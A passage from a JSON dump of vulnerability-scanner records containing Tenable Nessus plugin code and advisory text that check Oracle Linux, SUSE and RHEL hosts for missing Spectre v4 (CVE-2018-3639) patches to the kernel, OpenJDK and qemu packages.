audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-3639\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2018-1629\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.10\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-862.3.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-abi-whitelists-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-862.3.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-862.3.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-862.3.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-862.3.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-doc-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-862.3.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-headers-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-862.3.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-862.3.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-862.3.2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-862.3.2.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-862.3.2.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-862.3.2.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2020-02-01T01:33:19", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2018:1650 :\n\nAn update for java-1.8.0-openjdk is now available for Red Hat\nEnterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime\nEnvironment and the OpenJDK 8 Java Software Development Kit.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor", "modified": "2020-02-02T00:00:00", "id": "ORACLELINUX_ELSA-2018-1650.NASL", "href": "https://www.tenable.com/plugins/nessus/109983", "published": "2018-05-23T00:00:00", "title": "Oracle Linux 6 : java-1.8.0-openjdk (ELSA-2018-1650) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2018:1650 and \n# Oracle Linux Security Advisory ELSA-2018-1650 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109983);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"RHSA\", value:\"2018:1650\");\n\n script_name(english:\"Oracle Linux 6 : java-1.8.0-openjdk (ELSA-2018-1650) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2018:1650 :\n\nAn update for java-1.8.0-openjdk is now available for Red Hat\nEnterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime\nEnvironment and the OpenJDK 8 Java Software Development Kit.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor's data cache even\nfor speculatively executed instructions that never actually commit\n(retire). As a result, an unprivileged attacker could use this flaw to\nread privileged memory by conducting targeted cache side-channel\nattacks. (CVE-2018-3639)\n\nNote: This is the OpenJDK side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-May/007757.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.8.0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.8.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.8.0-openjdk-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.8.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.8.0-openjdk-demo-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.8.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.8.0-openjdk-devel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.8.0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.8.0-openjdk-headless-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.8.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.8.0-openjdk-javadoc-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.8.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.8.0-openjdk-src-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"java-1.8.0-openjdk-1.8.0.171-8.b10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.8.0-openjdk-debug-1.8.0.171-8.b10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.8.0-openjdk-demo-1.8.0.171-8.b10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.8.0-openjdk-demo-debug-1.8.0.171-8.b10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.8.0-openjdk-devel-1.8.0.171-8.b10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.8.0-openjdk-devel-debug-1.8.0.171-8.b10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.8.0-openjdk-headless-1.8.0.171-8.b10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.8.0-openjdk-headless-debug-1.8.0.171-8.b10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.8.0-openjdk-javadoc-1.8.0.171-8.b10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.8.0-openjdk-javadoc-debug-1.8.0.171-8.b10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.8.0-openjdk-src-1.8.0.171-8.b10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.8.0-openjdk-src-debug-1.8.0.171-8.b10.el6_9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.8.0-openjdk / java-1.8.0-openjdk-debug / etc\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2020-02-01T02:20:13", "bulletinFamily": "scanner", "description": "This update for qemu fixes several issues. This security issue was\nfixed :\n\n - CVE-2018-3639: Spectre v4 vulnerability mitigation\n support for KVM guests (bsc#1092885). Systems with\n microprocessors utilizing speculative execution and\n speculative execution of memory reads before the\n addresses of all prior memory writes are known may allow\n unauthorized disclosure of information to an attacker\n with local user access via a side-channel analysis. This\n patch permits the new x86 cpu feature flag named ", "modified": "2020-02-02T00:00:00", "id": "SUSE_SU-2018-1362-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110029", "published": "2018-05-23T00:00:00", "title": "SUSE SLES12 Security Update : qemu (SUSE-SU-2018:1362-1) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1362-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110029);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/10 13:51:47\");\n\n script_cve_id(\"CVE-2018-3639\");\n\n script_name(english:\"SUSE SLES12 Security Update : qemu (SUSE-SU-2018:1362-1) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for qemu fixes several issues. This security issue was\nfixed :\n\n - CVE-2018-3639: Spectre v4 vulnerability mitigation\n support for KVM guests (bsc#1092885). Systems with\n microprocessors utilizing speculative execution and\n speculative execution of memory reads before the\n addresses of all prior memory writes are known may allow\n unauthorized disclosure of information to an attacker\n with local user access via a side-channel analysis. This\n patch permits the new x86 cpu feature flag named 'ssbd'\n to be presented to the guest, given that the host has\n this feature, and KVM exposes it to the guest as well.\n For this feature to be enabled please use the qemu\n commandline\n\n -cpu $MODEL,+spec-ctrl,+ssbd so the guest OS can take\n advantage of the feature. spec-ctrl and ssbd support is\n also required in the host. This feature was added :\n\n - Add support for block resize support for xen disks\n through the monitor\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1079405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3639/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181362-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e9a14854\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2018-946=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-946=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-946=1\n\nSUSE Enterprise Storage 4:zypper in -t patch SUSE-Storage-4-2018-946=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-rbd-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-rbd-debuginfo-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-x86-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-x86-debuginfo-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"qemu-s390-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"qemu-s390-debuginfo-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-curl-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-curl-debuginfo-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-ssh-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-ssh-debuginfo-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-debugsource-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-guest-agent-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-guest-agent-debuginfo-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-lang-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-tools-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-tools-debuginfo-2.6.2-41.40.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-kvm-2.6.2-41.40.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2020-02-01T01:49:36", "bulletinFamily": "scanner", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.3\nExtended Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor", "modified": "2020-02-02T00:00:00", "id": "REDHAT-RHSA-2018-1636.NASL", "href": "https://www.tenable.com/plugins/nessus/109997", "published": "2018-05-23T00:00:00", "title": "RHEL 7 : kernel (RHSA-2018:1636) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1636. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109997);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/10/24 15:35:44\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"RHSA\", value:\"2018:1636\");\n script_xref(name:\"IAVA\", value:\"2018-A-0170\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2018:1636) (Spectre)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.3\nExtended Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor's data cache even\nfor speculatively executed instructions that never actually commit\n(retire). As a result, an unprivileged attacker could use this flaw to\nread privileged memory by conducting targeted cache side-channel\nattacks. (CVE-2018-3639)\n\nNote: This issue is present in hardware and cannot be fully fixed via\nsoftware update. The updated kernel packages provide software side of\nthe mitigation for this hardware issue. To be fully functional,\nup-to-date CPU microcode applied on the system is required. Please\nrefer to References section for further information about this issue,\nCPU microcode requirements and the potential performance impact.\n\nIn this update mitigations for x86-64 architecture are provided.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/ssbd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:1636\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3639\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 